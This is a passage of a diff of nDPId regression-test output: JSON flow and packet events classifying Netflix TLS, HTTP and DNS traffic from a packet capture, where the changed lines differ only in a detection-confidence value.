+01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319070636,"flow_last_seen":1484319070636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319070636,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1484319070636,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319070636,"pkt":"gCqoTGHM5JjWH70UCABFAABAs25AAEAGoh\/AqAEHF\/YLhc\/aAFBx1HGxAAAAALAC\/\/84uwAAAgQFtAEDAwUBAQgKH2VGAgAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1484319070655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319070655,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz9pdV1SucdRxsqAS\/\/+\/OwAAAgQFtAEDAwkEAggKgYtW3h9lRgI="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2499,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1484319070656,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319070656,"pkt":"gCqoTGHM5JjWH70UCABFAAA0S\/NAAEAGCafAqAEHF\/YLhc\/aAFBx1HGyXVdUr4AQEBXd4QAAAQEICh9lRhWBi1be"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2501,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319070636,"flow_last_seen":1484319070660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319070660,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319091296,"flow_last_seen":1484319091296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319091296,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4214,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1484319091296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319091296,"pkt":"gCqoTGHM5JjWH70UCABFAABAakNAAEAG60LAqAEHF\/YLjc\/hAFDAgDYQAAAAALAC\/\/\/YUQAAAgQFtAEDAwUBAQgKH2WTUQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4216,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1484319091309,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319091309,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz+FsswOfwIA2EaAS\/\/85DQAAAgQFtAEDAwkEAggK\/T5Cox9lk1E="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4217,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1484319091310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319091310,"pkt":"gCqoTGHM5JjWH70UCABFAAA00UpAAEAGhEfAqAEHF\/YLjc\/hAFDAgDYRbLMDoIAQEBVXuAAAAQEICh9lk1\/9PkKj"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4218,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319091296,"flow_last_seen":1484319091314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319091314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1484319114365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319114365,"pkt":"gCqoTGHM5JjWH70UCABFAABCZ6UAAEARj63AqAEHwKgBAcmmADUALqajKFkBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1484319114365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319114365,"pkt":"gCqoTGHM5JjWH70UCABFAABCN7AAAEARv6LAqAEHwKgBAcmmADUALiWYqUkBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="} -00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1484319114384,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1484319114384,"pkt":"5JjWH70UgCqoTGHMCABFAAEF4UpAAEAR1UTAqAEBwKgBBwA1yaYA8aaTKFmBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAhAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAEXABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AAQABAAAALwAENCAW1sBNAAEAAQAAAC8ABDQiMaPATQABAAEAAAAvAAQ0GyTuwE0AAQABAAAALwAENCJwJsBNAAEAAQAAAC8ABDQi04bATQABAAEAAAAvAAQ0GRpcwE0AAQABAAAALwAENCDSq8BNAAEAAQAAAC8ABDQi5lM="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319114365,"flow_last_seen":1484319114384,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319114384,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"52.32.22.214"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319114365,"flow_last_seen":1484319114384,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319114384,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"52.32.22.214"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114406,"flow_last_seen":1484319114406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319114406,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1484319114406,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319114406,"pkt":"gCqoTGHM5JjWH70UCABFAABAaktAAEAGw8fAqAEHNCAW1s\/2Abt+TgYJAAAAALAC\/\/\/LHgAAAgQFtAEDAwUBAQgKH2XpygAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6412,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1484319114455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319114455,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG7z\/ZJSmsOfk4GCqASOJAVRAAAAgQFtAQCCAq2sSMxH2XpygEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6414,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1484319114457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319114457,"pkt":"gCqoTGHM5JjWH70UCABFAAA03p5AAEAGT4DAqAEHNCAW1s\/2Abt+TgYKSUprD4AQEBVsWgAAAQEICh9l6fy2sSMx"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 